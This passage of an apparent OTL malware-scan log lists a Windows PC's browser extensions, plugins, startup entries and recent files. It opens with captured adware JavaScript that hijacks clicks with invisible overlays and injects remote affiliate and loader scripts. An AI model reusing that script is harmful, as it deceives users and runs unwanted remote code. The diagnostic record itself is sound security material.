k=document.getElementById(\"ucd-countdown-1\"),h=[];h.push(1*k.children[2].children[1].children[1].innerText);h.push(1*k.children[2].children[2].children[1].innerText);h.push(1*k.children[3].children[1].children[1].innerText);h.push(1*k.children[3].children[2].children[1].innerText);for(var n=k=0;n<h.length;n++)k+=h[n];if(!(0<k)){clearInterval(g);var l=document.createElement(\"div\");l.style.position=\n\"absolute\";l.style.top=0;l.style.left=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";var r=document.getElementById(\"ucd-countdown-1-content\").children[1];r.style.position=\"relative\";r.appendChild(l)}}catch(v){try{var q=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){q+=1*jQuery(this).text()});if(0===q){clearInterval(g);var t=jQuery(\"#ucd-countdown-1-content iframe\"),u=t.parent();t.remove();u.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(w){\"undefined\"!==\ntypeof f&&30<++f&&clearInterval(g)}}},750)}catch(h){}})();var __intervalcountasd=0,__intervalasd=setInterval(function(){__intervalcountasd++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var b=0;b<document.links.length;b++)try{var c=document.links.href.toLowerCase();if(-1==c.indexOf(\"ww.ziddu.co\")&&-1==c.indexOf(\"#\")&&-1==c.indexOf(\"tunes.apple.co\")&&-1==c.indexOf(\"lay.google.co\")&&-1==c.indexOf(\"/gallery/\")){try{for(var e=document.links,f=0;15>=f;f++)e=e.parentNode;if(-1<e.className.indexOf(\"footerbg\"))continue}catch(g){}var d=document.links.parentNode;\nif(!(-1<d.className.indexOf(\"addthis_toolbox\"))){d.style.position=\"relative\";var a=document.createElement(\"div\");a.style.position=\"absolute\";a.style.left=0;a.style.top=0;a.style.width=\"100%\";a.style.height=\"100%\";a.style.zIndex=\"9999\";a.style.cursor=\"pointer\";d.appendChild(a)}}}catch(h){}c=document.getElementsByTagName(\"iframe\");for(b=0;b<c.length;b++)try{-1==c.src.indexOf(\"acebook.co\")&&-1==c.src.indexOf(\"cp.crwdcntrl.ne\")&&(d=c.parentNode,d.style.position=\"relative\",a=document.createElement(\"div\"),\na.style.position=\"absolute\",a.style.left=0,a.style.top=0,a.style.width=\"100%\",a.style.height=\"100%\",a.style.zIndex=\"9999\",a.style.cursor=\"pointer\",a.id=b,d.appendChild(a))}catch(k){}}20<__intervalcountasd&&clearInterval(__intervalasd)},500);;if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=1&name=ExxstrraCoupoon';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache1-a.akamaihd.net/loaders/1649/l.js?aoi=1311798366&pid=1649&zoneid=287609&ext=ExxstrraCoupoon&systemid=12403480529111048514&ext=ExxstrraCoupoon\";document.getElementsByTagName(\"head\")[0].appendChild(script)};})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: ClassicThemeRestorer%40ArisT2Noia4dev:1.2.2
FF - prefs.js..extensions.enabledAddons: adblockpopups%40jessehakanen.net:0.9.2
FF - prefs.js..extensions.enabledAddons: clearConsole%40penzil.com:1.10
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:30.0


FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Users\Guest\Desktop\Pix\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files (x86)\Java\jre7\bin\new_plugin\npjp2.dll File not found
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3508.1109: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.net/NxGame: C:\ProgramData\NexonUS\NGM\npNxGameUS.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.1: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.1: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.2: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.3: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\2\NP_wtapp.dll ()
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\FFExt\[email protected] [2012/03/23 14:59:57 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\FFExt\[email protected] [2012/03/23 14:59:57 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\[email protected]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 30.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2014/06/18 20:53:17 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 30.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins

[2011/08/31 19:22:04 | 000,000,000 | ---D | M] (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Extensions
[2014/07/26 01:31:36 | 000,000,000 | ---D | M] (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions
[2014/07/26 01:28:28 | 000,133,000 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\[email protected]
[2014/07/09 20:33:39 | 000,344,276 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\[email protected]
[2014/07/26 01:31:36 | 000,059,886 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\[email protected]
[2014/07/03 13:57:51 | 001,225,715 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\[email protected]
[2014/07/23 20:06:41 | 000,967,685 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2014/07/26 01:27:51 | 000,553,273 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\{fe272bd1-5f76-4ea4-8501-a05d35d823fc}.xpi
[2014/06/18 20:53:17 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2014/06/18 20:53:17 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files (x86)\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2014/06/18 20:53:17 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/06/18 20:53:17 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2014/06/18 20:53:22 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

========== Chrome ==========

CHR - homepage: http://search.easylifeapp.com/
CHR - Extension: Better CDCS = C:\Users\VPaez\AppData\Local\Google\Chrome\User Data\Default\Extensions\adaiboomihahdddciolkcfhalmdnlneh\190\
CHR - Extension: Plurk Smile = C:\Users\VPaez\AppData\Local\Google\Chrome\User Data\Default\Extensions\aomdjjfldjbbnojlonpahdajglndlomc\130\
CHR - Extension: FunoDeaals = C:\Users\VPaez\AppData\Local\Google\Chrome\User Data\Default\Extensions\cpaeahjnchmhblnpepaacaikbcbcchpd\2.2\
CHR - Extension: Post to WordPress = C:\Users\VPaez\AppData\Local\Google\Chrome\User Data\Default\Extensions\hhmhfcfbheceghfbfjgkjnlhooadpnej\240\
CHR - Extension: saaVVe nnEt = C:\Users\VPaez\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdelphdfoadjohajdkbdgdmiefhdanla\5.14\
CHR - Extension: AlllChheeapPricE = C:\Users\VPaez\AppData\Local\Google\Chrome\User Data\Default\Extensions\kemgffnocjinldhlfacckobmanlbgbdh\5.2\
CHR - Extension: BrOwwsae2saevEe = C:\Users\VPaez\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlofhgciibedoicdlfekiokmgfmljlmd\1\
CHR - Extension: Fuun2SaVoe = C:\Users\VPaez\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmihoffbmhlcicbpfpeaedagcpnkibpj\4.5\

O1 HOSTS File: ([2009/06/10 15:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:64bit: - BHO: (IEVkbdBHO Class) - {59273AB4-E7D3-40F9-A1A8-6FA9CCA1862C} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\x64\ievkbd.dll (Kaspersky Lab ZAO)
O2:64bit: - BHO: (Skype add-on for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
O2:64bit: - BHO: (FilterBHO Class) - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\x64\klwtbbho.dll (Kaspersky Lab ZAO)
O2 - BHO: (IEVkbdBHO Class) - {59273AB4-E7D3-40F9-A1A8-6FA9CCA1862C} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\ievkbd.dll (Kaspersky Lab ZAO)
O2 - BHO: (Skype Browser Helper) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (FilterBHO Class) - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\klwtbbho.dll (Kaspersky Lab ZAO)
O2 - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll File not found
O3 - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\Toolbar\WebBrowser: (no name) - {687578B9-7132-4A7A-80E4-30EE31099E03} - No CLSID value found.
O3 - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\Toolbar\WebBrowser: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - No CLSID value found.
O4:64bit: - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:64bit: - HKLM..\Run: [LogMeIn GUI] "C:\Users\Guest\Desktop\Pix\LogMeIn\x64\LogMeInSystray.exe" File not found
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [AVP] C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\avp.exe (Kaspersky Lab ZAO)
O4 - HKLM..\Run: [LifeCam] C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe (Microsoft Corporation)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-39689524-2389588003-3980284778-1000..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - Startup: C:\Users\VPaez\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O7 - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDesktopCleanupWizard = 1
O9:64bit: - Extra Button: &Virtual Keyboard - {4248FE82-7FCB-46AC-B270-339F08212110} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\x64\ievkbd.dll (Kaspersky Lab ZAO)
O9:64bit: - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
O9:64bit: - Extra Button: URLs c&heck - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\x64\klwtbbho.dll (Kaspersky Lab ZAO)
O9 - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe File not found
O9 - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe File not found
O9 - Extra Button: &Virtual Keyboard - {4248FE82-7FCB-46AC-B270-339F08212110} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\ievkbd.dll (Kaspersky Lab ZAO)
O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O9 - Extra Button: URLs c&heck - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\klwtbbho.dll (Kaspersky Lab ZAO)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKU\.DEFAULT\..Trusted Domains: clonewarsadventures.com ([]* in Trusted sites)
O15 - HKU\.DEFAULT\..Trusted Domains: freerealms.com ([]* in Trusted sites)
O15 - HKU\.DEFAULT\..Trusted Domains: soe.com ([]* in Trusted sites)
O15 - HKU\.DEFAULT\..Trusted Domains: sony.com ([]* in Trusted sites)
O15 - HKU\S-1-5-18\..Trusted Domains: clonewarsadventures.com ([]* in Trusted sites)
O15 - HKU\S-1-5-18\..Trusted Domains: freerealms.com ([]* in Trusted sites)
O15 - HKU\S-1-5-18\..Trusted Domains: soe.com ([]* in Trusted sites)
O15 - HKU\S-1-5-18\..Trusted Domains: sony.com ([]* in Trusted sites)
O15 - HKU\S-1-5-19\..Trusted Domains: clonewarsadventures.com ([]* in )
O15 - HKU\S-1-5-19\..Trusted Domains: freerealms.com ([]* in )
O15 - HKU\S-1-5-19\..Trusted Domains: soe.com ([]* in )
O15 - HKU\S-1-5-19\..Trusted Domains: sony.com ([]* in )
O15 - HKU\S-1-5-20\..Trusted Domains: clonewarsadventures.com ([]* in )
O15 - HKU\S-1-5-20\..Trusted Domains: freerealms.com ([]* in )
O15 - HKU\S-1-5-20\..Trusted Domains: soe.com ([]* in )
O15 - HKU\S-1-5-20\..Trusted Domains: sony.com ([]* in )
O15 - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..Trusted Domains: clonewarsadventures.com ([]* in Trusted sites)
O15 - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..Trusted Domains: freerealms.com ([]* in Trusted sites)
O15 - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..Trusted Domains: soe.com ([]* in Trusted sites)
O15 - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..Trusted Domains: sony.com ([]* in Trusted sites)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 10.55.2)
O16 - DPF: {CAFEEFAC-0017-0000-0055-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_55)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_55)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254 75.153.176.9
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{272DC1CF-45C6-47D8-BED0-6939FBDB79F8}: DhcpNameServer = 192.168.1.254 75.153.176.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{945BC30D-3EB8-486D-9099-8301B50DD5C0}: DhcpNameServer = 192.168.1.254 75.153.176.9
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll File not found
O18 - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll File not found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O20:64bit: - AppInit_DLLs: (C:\PROGRA~2\GSSUPP~1\ASSIST~2.DLL) - C:\Program Files (x86)\GS Supporter\Assistant_x64.dll ()
O20 - AppInit_DLLs: (c:\progra~2\gssupp~1\assist~1.dll) - c:\Program Files (x86)\GS Supporter\Assistant.dll ()
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O20:64bit: - Winlogon\Notify\klogon: DllName - (%SystemRoot%\System32\klogon.dll) - C:\Windows\SysNative\klogon.dll (Kaspersky Lab ZAO)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{b157c058-e6b2-11e0-a108-e06995d09c96}\Shell - "" = AutoRun
O33 - MountPoints2\{b157c058-e6b2-11e0-a108-e06995d09c96}\Shell\AutoRun\command - "" = J:\setup.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)


CREATERESTOREPOINT
Restore point Set: OTL Restore Point

========== Files/Folders - Created Within 30 Days ==========

[2014/07/26 02:05:36 | 000,000,000 | -HSD | C] -- C:\Users\VPaez\AppData\Local\EmieUserList
[2014/07/26 02:05:36 | 000,000,000 | -HSD | C] -- C:\Users\VPaez\AppData\Local\EmieSiteList
[2014/07/26 01:42:18 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware
[2014/07/26 00:09:55 | 000,000,000 | ---D | C] -- C:\Users\VPaez\AppData\Local\Network_Me_07260609
[2014/07/26 00:09:26 | 000,000,000 | ---D | C] -- C:\ProgramData\IePluginServices
[2014/07/16 11:09:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Riot Games
[2014/07/13 17:06:13 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
[2014/07/13 17:05:24 | 000,000,000 | ---D | C] -- C:\Program Files\iTunes
[2014/07/13 17:05:24 | 000,000,000 | ---D | C] -- C:\Program Files\iPod
[2014/07/13 17:05:24 | 000,000,000 | ---D | C] -- C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
[2014/07/09 13:59:52 | 000,519,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/07/09 13:59:52 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/07/09 13:59:42 | 000,692,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\osk.exe
[2014/07/09 13:59:42 | 000,646,144 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\osk.exe
[2014/07/09 13:59:39 | 000,624,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\qedit.dll
[2014/07/09 13:59:39 | 000,509,440 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\qedit.dll
[2014/07/09 13:59:37 | 000,307,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ncrypt.dll
[2014/07/09 13:59:35 | 000,592,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll
[2014/07/09 13:59:35 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/07/09 13:59:35 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll
[2014/07/09 13:59:35 | 000,033,792 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll
[2014/07/09 13:59:34 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll
[2014/07/09 13:59:34 | 000,038,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll
[2014/07/09 13:59:34 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll
[2014/07/09 13:59:34 | 000,032,256 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
[2014/07/09 13:59:33 | 001,964,544 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2014/07/09 13:59:33 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll
[2014/07/09 13:59:32 | 000,631,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll
[2014/07/09 13:59:32 | 000,452,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll
[2014/07/09 13:59:32 | 000,442,368 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll
[2014/07/09 13:59:32 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe
[2014/07/09 13:59:32 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll
